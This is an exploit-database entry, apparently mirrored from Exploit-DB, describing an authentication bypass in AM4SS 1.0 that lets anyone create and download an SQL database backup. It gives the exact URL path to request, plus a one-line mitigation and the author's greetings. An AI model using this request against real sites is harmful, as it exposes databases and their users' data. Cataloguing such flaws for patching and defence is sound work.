header-logo
Suggest Exploit
vendor:
AM4SS 1.0
by:
indoushka
7,5
CVSS
HIGH
Bypass Creat And Download Buckup Sql
N/A
CWE
Product Name: AM4SS 1.0
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
Unknown

Advanced Management For Services Sites =>by pass Creat And Download Buckup Sql Vulnerability

A vulnerability exists in Advanced Management For Services Sites which allows an attacker to bypass the authentication and create and download a backup of the SQL database. The attacker can access the backup.php page without authentication and create and download a backup of the SQL database.

Mitigation:

Ensure that authentication is properly implemented and enforced for all pages that require it.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Advneced Management For Services Sites =>by pass Creat And Download Buckup Sql Vulnerability            
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : http://am4ss.com/am4ss.zip                                                                                                                                                                                                       
| # Script   : Powered by AM4SS 1.0     
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Backup Dump                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- http://127.0.0.1/am4ss/admincp/misc.php/login.php?do=backup (CReat And Download Backup)
 
 2- http://127.0.0.1/am4ss/admincp/login.php (2 Login)
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------